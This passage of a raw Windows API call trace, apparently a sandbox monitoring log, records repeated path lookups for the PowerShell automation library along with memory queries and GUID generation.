lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.892] GetLastError () returned 0x0 [0089.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.892] GetLastError () returned 0x0 [0089.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.892] GetLastError () returned 0x0 [0089.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.892] GetLastError () returned 0x0 [0089.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.892] GetLastError () returned 0x0 [0089.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.892] GetLastError () returned 0x0 [0089.892] VirtualQuery (in: lpAddress=0x13ce44, lpBuffer=0x13de44, dwLength=0x1c | out: lpBuffer=0x13de44*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.892] VirtualQuery (in: lpAddress=0x13ce80, lpBuffer=0x13de80, dwLength=0x1c | out: lpBuffer=0x13de80*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dc34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.893] GetLastError () returned 0x0 [0089.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dbe4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.893] GetLastError () returned 0x0 [0089.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dbe4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.893] GetLastError () returned 0x0 [0089.893] VirtualQuery (in: lpAddress=0x13cf4c, lpBuffer=0x13df4c, dwLength=0x1c | out: lpBuffer=0x13df4c*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dc34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.893] GetLastError () returned 0x0 [0089.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dbe4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.893] GetLastError () returned 0x0 [0089.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dbe4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.893] GetLastError () returned 0x0 [0089.893] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x5b34e55e, Data2=0xcaea, Data3=0x43d5, Data4=([0]=0xbe, [1]=0x85, [2]=0x4e, [3]=0x97, [4]=0x1d, [5]=0xc2, [6]=0x4, [7]=0x4d))) returned 0x0 [0089.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.893] GetLastError () returned 0x0 [0089.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.893] GetLastError () returned 0x0 [0089.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.893] GetLastError () returned 0x0 [0089.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.893] GetLastError () returned 0x0 [0089.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.893] GetLastError () returned 0x0 [0089.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.894] GetLastError () returned 0x0 [0089.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.894] GetLastError () returned 0x0 [0089.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.894] GetLastError () returned 0x0 [0089.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.894] GetLastError () returned 0x0 [0089.894] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xb8fb4873, Data2=0x4464, Data3=0x4e3c, Data4=([0]=0xa5, [1]=0xb1, [2]=0x37, [3]=0xd4, [4]=0xfd, [5]=0xb9, [6]=0x2a, [7]=0x78))) returned 0x0 [0089.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.894] GetLastError () returned 0x0 [0089.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.894] GetLastError () returned 0x0 [0089.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.894] GetLastError () returned 0x0 [0089.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.894] GetLastError () returned 0x0 [0089.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.894] GetLastError () returned 0x0 [0089.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.894] GetLastError () returned 0x0 [0089.894] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xe9d93885, Data2=0xd3cb, Data3=0x46a5, Data4=([0]=0xa6, [1]=0xe, [2]=0x24, [3]=0xbb, [4]=0x40, [5]=0x6, [6]=0x1c, [7]=0x9b))) returned 0x0 [0089.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.894] GetLastError () returned 0x0 [0089.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.895] GetLastError () returned 0x0 [0089.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.895] GetLastError () returned 0x0 [0089.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.895] GetLastError () returned 0x0 [0089.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.895] GetLastError () returned 0x0 [0089.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.895] GetLastError () returned 0x0 [0089.895] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x325c41be, Data2=0x4fb8, Data3=0x40e5, Data4=([0]=0x9d, [1]=0x5, [2]=0x6e, [3]=0xdb, [4]=0xd4, [5]=0x2a, [6]=0x3b, [7]=0x30))) returned 0x0 [0089.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.895] GetLastError () returned 0x0 [0089.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.895] GetLastError () returned 0x0 [0089.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.895] GetLastError () returned 0x0 [0089.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.895] GetLastError () returned 0x0 [0089.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.895] GetLastError () returned 0x0 [0089.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.895] GetLastError () returned 0x0 [0089.895] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xe76ac4c8, Data2=0xd68, Data3=0x4ea6, Data4=([0]=0x94, [1]=0xad, [2]=0xad, [3]=0xb1, [4]=0xdc, [5]=0xb, [6]=0xe, [7]=0x5d))) returned 0x0 [0089.895] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xcff0b045, Data2=0x313a, Data3=0x41e7, Data4=([0]=0xa4, [1]=0x24, [2]=0x98, [3]=0xc, [4]=0x9a, [5]=0x51, [6]=0x5b, [7]=0x7))) returned 0x0 [0089.896] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0x9e845779, Data2=0xdc2c, Data3=0x42ea, Data4=([0]=0xb7, [1]=0xdb, [2]=0x86, [3]=0x3c, [4]=0xbd, [5]=0x98, [6]=0x1a, [7]=0xae))) returned 0x0 [0089.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.896] GetLastError () returned 0x0 [0089.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.896] GetLastError () returned 0x0 [0089.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.896] GetLastError () returned 0x0 [0089.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.896] GetLastError () returned 0x0 [0089.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.896] GetLastError () returned 0x0 [0089.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.896] GetLastError () returned 0x0 [0089.896] CoCreateGuid (in: pguid=0x13e4f8 | out: pguid=0x13e4f8*(Data1=0xca52c03e, Data2=0xfae2, Data3=0x4675, Data4=([0]=0xaa, [1]=0x1b, [2]=0xe0, [3]=0x8b, [4]=0x11, [5]=0x13, [6]=0xf6, [7]=0x61))) returned 0x0 [0089.896] VirtualQuery (in: lpAddress=0x13cda4, lpBuffer=0x13dda4, dwLength=0x1c | out: lpBuffer=0x13dda4*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.896] GetLastError () returned 0x0 [0089.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.896] GetLastError () returned 0x0 [0089.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.897] GetLastError () returned 0x0 [0089.897] VirtualQuery (in: lpAddress=0x13cda4, lpBuffer=0x13dda4, dwLength=0x1c | out: lpBuffer=0x13dda4*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.897] VirtualQuery (in: lpAddress=0x13cde0, lpBuffer=0x13dde0, dwLength=0x1c | out: lpBuffer=0x13dde0*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d798, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.897] GetLastError () returned 0x0 [0089.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d748, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.897] GetLastError () returned 0x0 [0089.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d748, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.897] GetLastError () returned 0x0 [0089.897] VirtualQuery (in: lpAddress=0x13cda4, lpBuffer=0x13dda4, dwLength=0x1c | out: lpBuffer=0x13dda4*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.897] VirtualQuery (in: lpAddress=0x13cde0, lpBuffer=0x13dde0, dwLength=0x1c | out: lpBuffer=0x13dde0*(BaseAddress=0x13c000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d798, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.897] GetLastError () returned 0x0 [0089.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d748, lpFilePart=0x0 | out: 